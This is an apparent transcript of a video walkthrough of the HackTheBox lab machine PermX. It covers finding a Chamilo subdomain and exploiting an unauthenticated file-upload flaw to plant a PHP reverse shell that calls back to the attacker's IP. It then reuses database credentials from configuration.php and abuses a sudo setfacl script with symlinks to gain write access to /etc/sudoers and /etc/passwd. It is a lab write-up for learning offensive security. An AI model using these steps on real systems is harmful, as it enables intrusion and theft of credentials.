What's going on YouTube? This is Ipsec. We're doing PermX from HackTheBox, which essentially is just 3 steps. The first of which is discovering the LMS Sub Domain, which contains software called Chamilo, and this is an open source training platform. If you search for exploits, there's an unauthenticated file upload vulnerability, so you can upload a PHP file and get onto the box. Once there, if you extract the database credentials and try them with local users, you can gain access to a user, which has the ability to run bash scripts with sudo, that provides a way to give yourself write access to files via FACL that are in your home directory. However, if you create a symlink in your home directory, you can give yourself access to files outside of it and escalate to root. One of the extra things I did when solving the box is create a bash function to search Git repositories for files with an MD5 hash, which makes it easier to get an idea of what version of an open source application is running on a website. So with that being said, let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, -vv for double verbose. This gives us things like the TTL, OA output all formats, put in the nmap directory and call it PermX, then the IP address of 10.10.11.23. This can take some time to run, so I've already ran it. Looking at the results, we have just 2 ports open, the first one being SSH on port 22, and the banner tells us it's an Ubuntu server. We also have HTTP on port 80, its banner tells us it's Apache, also running on Ubuntu, and it's also redirecting us to permx.hdb. So let's go ahead and add this to our host file so we can browse to it. So we'll do sudo v etc host, then we can add 10.10.11.23 permx.hdb, save that, and we can navigate to it by the web browser, and going to the page, it just has an e-learning page. And if we click around, we see almost everything redirects us back to the home page. So it doesn't look like this page is fully functional yet. If I click about, we go to about.html and we just get some basic information. There's nothing really intriguing here. The main thing I'm looking for is some type of way to like log in or tell us what the site's built off of. Right now, this just looks like a completely static web page that doesn't really have that much content on it, right? If we do like read more on this course, it just brings us back to the top. Join now goes back here. So I'm not even really going to fuzz for like files, right? Because this is all HTML. This was PHP. Maybe I try things like login.php and GoBuster, but I'm just going to go straight to enumerating for a virtual host to see if there's other hosts on this box that may have a more interesting web server. So let's go ahead and use FFUF. So we'll do FFUF -u for URL, we'll do HTTP, permx.hdb, and then -H because we want to fuzz the header, specifically the host one because this is going to be what uses for virtual hosts. Then fuzz, it's important you do this in all caps. If you don't, then it's not going to work. We can show what that looks like real quick. So we can do just fuzz.permx.hdb and the word list of opt, sec list, discovery, DNS. Let's do subdomains, top 1 million, 5,000, because that's not going to take long at all. And it just finishes instantly without doing anything. So again, you have to specify fuzz, all caps, and then we get this. Now, the size keeps changing, and that's probably because we're redirecting and including maybe the virtual host in it. Let's do a curl. We'll do a -v. Let's see. V, sudo v etc host. Let's just add does not exist dot permx.hdb. I just want to see what this request looks like. So we can do a curl -v does not exist permx hdb. And let's see. I was expecting the header that we redirected. There we go. Right here. It's redirecting pieces of the domain back to us in the response. So that is why the size just changes, right? So we can't filter on size. We could filter on words, lines, or status code. You can also do the -AC for auto calibrate. That does generally a good job at filtering everything. But if I was doing this, I'd probably do FC for filter on status code and then just say, don't show me the 302s. And that does the job as well. We get a www and LMS. So let's go ahead and add those to our host file. So we'll do sudo v etc host. And then we can go and add, let's do www. And then LMS permx hdb. There we go. So taking a look at these pages, if we do http www.permx.hdb, we go back to the same thing. Let's do http LMS PermX HTB. And noticing right off the top, we have a title change and the page looks completely different. So we're running Chamilo. If we do like index.php, we confirm this is a PHP website. If we do HTML, it's going to error. Yes, it does. So we could just go straight for Googling for exploits. And if you're a beginner, that's probably what you want to do. But for me, I always like finding a way to fingerprint what version is running. And this is going to go beyond like the easy scope of the box, but I think it's still a skill that you should really learn, right? So one way to go about this is Googling what Chamilo is. And this is open source. If we searched around, we'd find the GitHub page. And it becomes really easy to enumerate versions when you have access to the GitHub, because you have every single file and its history, right? We could just curl like readme.md. So if I curl, let's do 10, 10, 11. Oh, no, we want to do LMS PermX HTB readme.md. Let's just close that window, clear things up. We can get the readme file, right? And this is going to tell us we're on version 1.11.x. So going to the GitHub, let's see, the readme. This says Chamilo 2. I bet if we went to branch 111x, we'd be able to find it, right? So this is probably our readme page. It looks somewhat close. What then I do is look at how often this readme changes. 3 years ago, this months ago, like the readme doesn't change all that often in this project, so we can't use this file. When that happens, I always look for a file that changes quite frequently. Normally that's some like JavaScript library or requirements.txt or composer.json, which composer.json is very similar to requirements.txt in Python. It's just going to list all the dependencies so Composer can go auto install it so your application works. So let's go see if we have composer.json. And we do. So I'm going to save this. So we'll just save it to composer.json. And now we want to clone this repository to our box. So we can go pull the MD5s for every single composer.json file. So I'm going to do a git clone on this. And the repository is actually relatively big. So I'm going to pause the video. We'll let this finish and then we'll resume. Okay, so we're just about done with the clone. And now we can begin enumerating all the files. So we're going to be mainly using two commands. I'll split my pane so you can see them both clearly. The first one's going to be a git log. First, we have to go into the directory, right? If we do a git log command, it's going to show every single commit. Now, with this git log, you can specify a file like composer.json, and it's only going to show the logs that have this file, right? So if I just do a git log word count for lines, we see 332,000. With specifying just this, we only have about 2,500, right? And I don't think you need those two dashes. No, we don't. The reason why I put it is because it just tells the program, don't treat anything after these as arguments. So it's just like raw input for file names. It's probably the clean way to do it. Now, the other thing we have to do is get the actual commit, right? We could just grep the word for commit and then do a awk print 2 to just get the commit, but that's not clean. And if the message has the word commit, we may have some bad lines. There is a -- pretty option in Git. And if we do pretty, we can specify, hey, we want the format to only be %h, which is the hash. And now maybe pretty comes after log. I think that's the case. There we go. So now we only have the commits. Awesome. The next command we want to run is going to be a git show command. So if we do git show and then a commit, we have to also go in the Git repo. We see the details of that. It has some metadata around it, like the commit, the author, and the ++ and minus. But if we do a colon and then just the file name we want, it's just going to give us the file. So what this allows us to do is just MD5 sum from this point, and we'll MD5 sum the file. So now we have a list of every single commit, and then a way to go into the commit and extract the file to get the MD5 sum. We just want to do that, right? So we'll do a for commit in this, and then we'll do a get show MD5 sum. We don't want to copy that whole line. We'll just do get show, then $commit, colon, the file name, composer.json, done. Shoot. We need to MD5 sum. There we go. So now we've just MD5 summed every file. The issue we have right now is we're not showing the commit. We're just showing the MD5. So I'll do a echo-n. We'll do commit space. There we go. So let's go up one directory. We save the composer.json off the server. So let's just MD5 sum the composer.json. And then we can grep this output for that hash. And we don't get anything. And the issue is we were in the 1.11, or the README is out of the 1.11x branch. We did it off of master. So we could either do a get branch to change a branch to the 1.11x, or we can probably do a get log dash, is it A for all? And that's going to, I want to say it was dash dash all. There we go. So I guess dash A is not it, it's dash dash all. And that's going to enable us to go into all branches, right? So if we just go up a few where we just have this, we can wc-l, composer.json is 373 times in the master branch. But if we add that dash dash all, it's now 514 because it existed in other branches. So going here, we have the commit here. So if I just do a get show on this commit, we can see August 1st, 2023 is when this file was introduced. So that's going to be around the time of the software deployment. So we can filter out any CVE probably before this date because it would have been patched, right? So this tells us exactly when it was deployed. Now, this took quite a bit to explain. We could just put automate this and put this in our bash history or BashRC file. So we always have this function, right? So if we wanted to, we could say get hunt, and then we won't really specify any arguments. We do this, and then let's replace the hash with $2, and then the file name with $1. And there's one more place we put the file name, right here. And it really likes this to be on a separate line. So now we have a get hunt command. So if I do get hunt, I already forgot what the hash was. MD5 sum composer. So we can say get hunt composer.json, paste this. We don't have to type that command. And if we wanted to, we could easily just save this. So if I copy this, v bashrc, let's put this near the top, get hunt. There we go. We can clean it up a little bit so it's easier to read. Echo commit, don't need that. There we go. And let's see, I'm just going to do a awk print 1 because we don't need to see the MD5 sum again. The first one's just going to be the commit. So this looks good. I'll save this. And then let's just create a new pane. If we go into Chamilo, I'm going to copy this command so we run it again. And we'll know import it from the bash history if this data is missing, right? The actual hash. So run it. And now we have that saved into our BashRC file. So if we ever wanted to hunt for a file, we could do that quickly. So hopefully you enjoyed that. I know I enjoy making these small optimizations, and this makes hunting for versions much, much quicker. So now let's just Google and do the easy way, Chamilo exploits. So we do Chamilo exploits. We see one right here. And we can probably ignore this one, right? Because this is 2021. Yeah, I'm going to go ahead and ignore that. Let's see. Chamilo exploit 2023. And looks like we have a few here. So November 28th, 2023, this is looking like what we want, right? We saw our file was on November 1st, 2023. This is November 28th. So we can probably search GitHub for this. So if we just do GitHub, we have a POC here. We could try to read the CVE details and understand what's going on, or just look at a Python script and see how it works. So let's see. We have a PHP reverse shell. So with open the file name, it's going to create a files dictionary. The argument's big upload file. This is going to be the contents of the file. And it's uploading to big upload PHP action post unsupported. So it looks like it's that simple. We just specify upload. So let's go ahead and grab a PHP shell. So I'll do cp user share laudanum PHP, then what is it? php-reverse shell.php. We can edit this because we want to put our IP address. There it is. We'll do 10, 10, 14, 8. I have 3 10s. 9001. There we go. And I'm going to rename this to just be rev.php so it's easier to type. And then that's going to be the place we want to upload to. So we'll do a curl. Let's see, is there file? I know there's an argument for file. It's either like dash lowercase or uppercase f. Output. File was a bad search. If I do like that, I think that's it. I think it's a form. So we'll do curl dash capital F. What is it? Big upload file. Big upload file is equal to at rev.php. I'm not positive if we're doing this right. PermX.htb, we need to do LMS. And we could just run the exploit script, right? But if it's something as simple as this, I like just doing it manually. Because this proves we understand what's going on in the exploit. It says the file has been successfully uploaded, so I think we did it correctly. Okay. And then we want to execute it, so it goes into this directory files, and then the file name. So let's do curl http lms permx.htb files. We called it rev.php and clvmp 9001. We have to close out our single quote, and we get a shell. So it is that simple. So let's upgrade a shell. So do python 3-c import pty spawn bin bash. There we go. st2i raw minus echo foreground. And we can export term is equal to xterm, which allows us to do things like clear the screen. So let's see. We're dub data. The first thing I like doing is going to the web source and trying to extract the database configuration, because to connect to MySQL, we need a password. It's always good to have passwords. And then once we get that, it allows us to go into the MySQL database and dump all the hashes and then try to crack those. So this is a good source to get a bunch of credentials, which then can be used for lateral movement. So we want to find where the configuration can be. I'm going to do find dot, and we're going to grep for config.php is common in PHP. There's a lot of them. Let's see. Database. Plugin. I don't think that's going to be it. Let's see. What's an app? There's a directory config. So we could also do like find dot dash type D for directory dash name config. And that's going to give us every config directory, which still has quite a bit. The vendor directory you can generally ignore because that's probably going to be dependencies. But we do have like apt resources like You can probably ignore that safely. This app config, this definitely looks interesting. So let's go in there. And then we have a config.yaml. That sounds good. So if we less config YAML, let's see, do we have passwords in here? Database, like the database password is in like a templating language. Let's see, grep, MySQL, all these. Let's hide error messages. So config parameters.dist. That doesn't look good. -I password. There's going to be a lot of them. There is a configuration.php. Did I just miss that? I did completely miss that. So let's look at configuration.php. And right at the top, we have localhost Chamilo DB password. So the user is Chamilo. This is the DB password. I'm going to cat etc passwd. Then I'm going to grep every line that ends in sh. And there's only one user on this box, that's MTZ. There's also a root user, but we can test this password with MTZ. So I can do su-mtz, put the password in, and that lets us log in as him, right? I would also go like MySQL-u, Chamilo-p, put this password in. Then we can do show databases, use Chamilo, show tables, look for where the users are. Okay, we need a semicolon. Let's do a describe users. User, not plural. And we can say select, what is it? Probably ID, user ID, username. ID. Let's just do username. And what's the password going to be? Probably password. From user. And we could try cracking these hashes as well, but we already made good progress by switching to MTZ user. So let's do that. We have to grab that password again because I did not save it. There we go. su-mtz, log in. And let's see. I'm actually going to SSH. 10, 10, 11, 23. Forgot at. Whenever like SSH is available, I like using it just because we get a proper shell. And then if we wanted to eventually tunnel, we could easily just do like the squiggly C, this on a new line, and that drops you in that prompt so we could tunnel. I like having SSH. So let's do a sudo-l. And we can see MTZ can run opt-acl with no arguments. So I'm going to cat this file. So if we cat it, we can see what we can do. So we need 3 arguments. User is the first argument, perm is the second, target is the 3. If the file is not in home MTZ, then we're going to echo access denied. Oh, I was like, I don't know what this is doing. This is probably checking for path traversal, right? Or target is equal to ... Access denied. Then we say if target, it needs to be a file. And if it is, we're going to run sudo set fackle. That sudo is not needed because we're already root at that point, right? If we do sudo-l, yeah, we'd already be root. So as root, it's going to run sudo again for good measure, I guess. Then we're going to do set fackle. The mode, I think that's what M stands for. User, MTZ, and then permissions on the target. So right now, I'm thinking there's 2 ways to exploit this. The first is probably going to be symlinks, right? So if I do, let's do a ln-s, and then we can specify a file. So let's just specify etc sudoers. And we could call it what we want. If I just specified sudoers, it would make the symlink there. But I learned with the ln command, if you don't specify a file name, it's going to create the symlink in your current directory with that file, which is pretty cool. So what we want to do is, what is it? Sudo opt ACL. We want to specify MTZ for the username. The permission, I'm going to give read, write, execute. And then we're going to do home MTZ sudoers. And now if I do get fackle on this, we can see the user MTZ has read, write, execute over etc sudoers. And if I do ls-la on it, it's still root, right? So these are just extended attributes. So this plus means there are fackles involved. So if we want now, we can just v etc sudoers, go here, and then we can just say all. I'm going to say bin bash. Now I do sudo -l. We can suddenly do sudo bash, and boom, we are root. So there's other ways we could exploit this, right? We could edit the passwd file. So if we do the same thing, let's see, ln-s at the passwd, then that sudo command, where is it? Home mtz passwd, then v etc passwd, and we can put a password for root. So if we just do openSSL passwd, all right, I guess please subscribe. That'll give us a hash, and it only goes to 8 characters. So we can put that here. Then su, and please, is that 8? 1, no, that's no way 8. That's 6. So I made that harder than it had to be. Please su. There we go. We are root. So we can edit passwd as well. We could edit the shadow file. What else could we do? Oddly enough, we can't edit a SetUID binary, which is odd. I'm going to leave this as a root shell. We want to grab this password again, copy sh mtz at 10.10.11.23. I'm just grabbing the root shell so it's easier to return there, right? But if we wanted to, we can't edit a SetUID binary. So let's show that. Cat opt ACL. What am I doing? Trying to remember exactly everything I did. Oh, symbolic link. Let's find a SetUID. So we'll do find /-perm -4000 hide error messages. So all these are SetUID binaries. I don't really care about. Let's get rid of gpasswd. This one doesn't really matter. So if we do ln-s on this, then opt acl.sh sudo mtz read write execute on home mtz gpasswd, we can now write to this. So if we do a get fackle on user bin gpasswd, we can write to it. And right now, the file still has a SetUID bit. Now, I'm just going to open this, and then we're going to do a W. We just wrote to it. We didn't write anything. We just did a write command of nothing. And then I look at this file again, and it removed the SetUID binary, or the SetUID bit. So that's why we can't just overwrite these binaries with other content with this. So that's a cool security thing. It did confuse me. I never thought that a low privilege user writing to a binary that's configured with SetUID would just erase that permission bit. The other thing, which is why I got a root shell, is if we try to do cron tab, something interesting happens. So let's do ln-s etc cron tab. And now we should be able to do that sudo command. Let's specify cron tab, and then v etc cron tab. And I'm just going to say every single minute, do a touch. Oh, we got to do it as root. Touch temp pwned. So I do ls-la temp, we don't have a pwned. We can do grep pwned. There we go. We don't have it. Actually, let's do a watch command so we can see exactly when it comes up. So let's do SSH MTZ at 10:10:11:23. Paste. Watch temp pwned. Not found. And I think the cleanup script actually changed that. That's annoying. ln-s, ln-s, there we go. V reset.sh, what is this doing? So I'm going to uncomment all these. So these are files that it's reverting. Okay. So let's make our change again. 1, 2, 3, 4, 5, root, touch, temp, pwned. Okay. So every minute, theoretically, we should be getting a file right there. And one just happened, and we did not get it. And the reason why is if we go to var log, I don't think there's a cron log. I think it's in messages. Let's see. It's either messages or syslog. Let's just tail 100 grep-i cron. We see it erroring. We have insecure mode group/other writable on Etsy cron tab. So we can't edit the cron easily because it goes into this insecure mode, which just refuses to run the cron. So on the next minute, we're going to see nothing happen, right? If I do date, we got another 15 seconds, so we can do sleep 15. And I'm going to see if we can tail this log quickly. Let's just do tail-f. So when the sleep finishes, I'm guessing we're going to see another insecure message that just says the cron wasn't ran because of this. Maybe that only happens when it reloads. Because it's definitely been that minute. Didn't get a message. It's probably just whenever a file is edited, right? V Etsy cron tab. Let's just write nothing. Let's see. I expected to see more. Doesn't look like it keeps repeating. Okay, that's fine. So if we then go back to use our sudo command, and I'm going to go say a dash for the permission. So this is going to remove the fackle, right? Let's just do that real quick. Or get fackle Etsy cron tab. We can see that, run it. It's now removed. We see the RWX is gone. So it's been a minute. It just ran. And this changed to permission denied, not found. It was trying to execute that. I should have done a ls temp pwned. But now you can see the cron is running because we have write permission there. So I think the last thing I want to do before I wrap up this video, a lot of people may think you could do like root's SSH key, but we can't because we don't have permission to go into the root directory. So because we don't have that, we don't have access to .sh to create the symlink, right? So if I do ln-s root SSH authorized keys, maybe? Let's do the set fackle. Opt MTZ. I thought we just, because we couldn't go in the directory, we couldn't create that symlink, but it looks like it did. So we just did that, V. Okay, I think because we can't write anymore. Let's see. 1 second. Root. Yeah. So we can create the symlink, but when we go to V it, it can't grab the file. Even though we would have permission to it, we just can't because we don't know where it is. So that's a weird thing where if we do a ls, it shows that symlink is created, but because we can't go into this SSH directory, we can't read the key. We can probably fully validate that. Let's do get fackle on authorized keys. We can see the permissions were set because this opt_acl runs as sudo, so it can see it and so it can follow the link. If I do a chmod 777 on .ssh, v authorized keys, we still get permission denied. Oh, because we can't get into root either. So there we go. Now, the link actually validates. So that's another thing. If you look and you got this white and red, that means, hey, I can't even find this file. We fixed the permission issue so we can go in these two directories, and it no longer shows red. So if we go to v it, it's an empty file, but we can now read it. So that's why we couldn't just edit authorized keys. Similarly, that's why we can't go in like var, spool, cron tabs and write to like root this way because we don't have we don't have access to the cron tabs directory. And that wraps up the box. So hope you guys enjoyed it. Take care, and I will see you all next time.